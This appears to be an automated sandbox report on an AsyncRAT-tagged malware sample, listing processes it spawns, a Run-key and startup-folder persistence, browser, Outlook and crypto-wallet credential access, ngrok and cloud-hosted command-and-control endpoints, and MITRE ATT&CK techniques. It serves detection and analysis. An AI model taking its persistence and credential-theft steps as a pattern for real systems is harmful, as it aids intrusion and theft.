asyncrat | 672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cbot.exe	cbot.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cbot.exe	cbot.exe

Executes dropped EXE 27 IoCs

pid	Process
3116	New Text Document mod.exe
880	._cache_New Text Document mod.exe
2364	Synaptics.exe
3080	._cache_Synaptics.exe
4076	Client-base.exe
3716	build.exe
3704	voidware_loader.exe
3228	New Text Document mod.exe
3024	._cache_New Text Document mod.exe
3288	DirectX111.exe
4972	gem2.exe
1412	gem1.exe
928	gem1.exe
4256	gem1.exe
4512	gem1.exe
4784	gem1.exe
4204	gem1.exe
5540	Lightshot.exe
5252	New Text Document mod.exe
1808	._cache_New Text Document mod.exe
3596	New Text Document mod.exe
5740	._cache_New Text Document mod.exe
2828	New Text Document mod.exe
5540	._cache_New Text Document mod.exe
1972	cbot.exe
2252	Client.exe
6064	svhost.exe

Loads dropped DLL 13 IoCs

pid	Process
2364	Synaptics.exe
2364	Synaptics.exe
3228	New Text Document mod.exe
3228	New Text Document mod.exe
5252	New Text Document mod.exe
5252	New Text Document mod.exe
3596	New Text Document mod.exe
3596	New Text Document mod.exe
2828	New Text Document mod.exe
2828	New Text Document mod.exe
2364	Synaptics.exe
2364	Synaptics.exe
2364	Synaptics.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	New Text Document mod.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 28 IoCs

Web Service

T1102

flow	ioc
488	raw.githubusercontent.com
1234	0.tcp.in.ngrok.io
284	drive.google.com
286	drive.google.com
731	0.tcp.in.ngrok.io
7	raw.githubusercontent.com
7	0.tcp.in.ngrok.io
7	drive.google.com
287	drive.google.com
486	0.tcp.in.ngrok.io
532	raw.githubusercontent.com
562	drive.google.com
1363	raw.githubusercontent.com
60	drive.google.com
160	0.tcp.in.ngrok.io
485	0.tcp.in.ngrok.io
622	raw.githubusercontent.com
640	0.tcp.in.ngrok.io
819	0.tcp.in.ngrok.io
11	raw.githubusercontent.com
61	drive.google.com
221	drive.google.com
13	raw.githubusercontent.com
451	drive.google.com
1714	0.tcp.in.ngrok.io
230	0.tcp.in.ngrok.io
1459	raw.githubusercontent.com
1834	6.tcp.eu.ngrok.io

Looks up external IP address via web service 11 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	api.ipify.org
35	api.ipify.org
609	api.ipify.org
610	api.ipify.org
707	api.ipify.org
780	reallyfreegeoip.org
798	api.ipify.org
635	ip-api.com
778	checkip.dyndns.org
778	reallyfreegeoip.org
810	ipinfo.io

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Power Settings 1 TTPs 24 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
6260	powercfg.exe
3712	powercfg.exe
7404	cmd.exe
5200	powercfg.exe
5196	powercfg.exe
5312	powercfg.exe
6336	powercfg.exe
6180	powercfg.exe
1728	powercfg.exe
8900	powercfg.exe
4488	powercfg.exe
4056	powercfg.exe
8608	powercfg.exe
5176	powercfg.exe
5192	powercfg.exe
5184	powercfg.exe
5404	powercfg.exe
4548	powercfg.exe
8824	powercfg.exe
4960	powercfg.exe
5412	powercfg.exe
3104	powercfg.exe
1800	powercfg.exe
4536	powercfg.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	Lightshot.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\MRT.exe	gem2.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 1412 set thread context of 4784	1412	gem1.exe	110
PID 1412 set thread context of 4204	1412	gem1.exe	111
PID 4972 set thread context of 5228	4972	gem2.exe	167
PID 5540 set thread context of 5272	5540	Lightshot.exe	198
PID 5540 set thread context of 4752	5540	Lightshot.exe	199
PID 5540 set thread context of 1576	5540	Lightshot.exe	204

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/0x000700000000069d-2129.dat	upx
behavioral3/memory/1972-2131-0x00007FF72A560000-0x00007FF72A577000-memory.dmp	upx
behavioral3/memory/1972-2433-0x00007FF72A560000-0x00007FF72A577000-memory.dmp	upx

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe

Launches sc.exe 26 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5460	sc.exe
5800	sc.exe
5760	sc.exe
1252	sc.exe
4536	sc.exe
6100	sc.exe
2820	sc.exe
5284	sc.exe
5440	sc.exe
3588	sc.exe
3700	sc.exe
3560	sc.exe
6516	sc.exe
1432	sc.exe
1036	sc.exe
616	sc.exe
1940	sc.exe
3492	sc.exe
1296	sc.exe
3240	sc.exe
2652	sc.exe
6892	sc.exe
1672	sc.exe
4072	sc.exe
5056	sc.exe
6164	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
1380	1412	WerFault.exe	105
344	5412	WerFault.exe	290
6672	6948	WerFault.exe	385
5456	6676	WerFault.exe	392
5660	5960	WerFault.exe	394

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gem1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gem1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 7 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3328	cmd.exe
4212	PING.EXE
5060	msedgewebview2.exe
1632	msedgewebview2.exe
6588	msedgewebview2.exe
6552	msedgewebview2.exe
8048	msedgewebview2.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral3/files/0x001900000002aeca-8213.dat	nsis_installer_1
behavioral3/files/0x001900000002aeca-8213.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 19 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Enumerates system info in registry 2 TTPs 10 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
6812	taskkill.exe
8516	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133812649634973239"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	lsass.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	lsass.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	lsass.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	lsass.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	lsass.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = 00000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000000000001000000ffffffff	chrome.exe
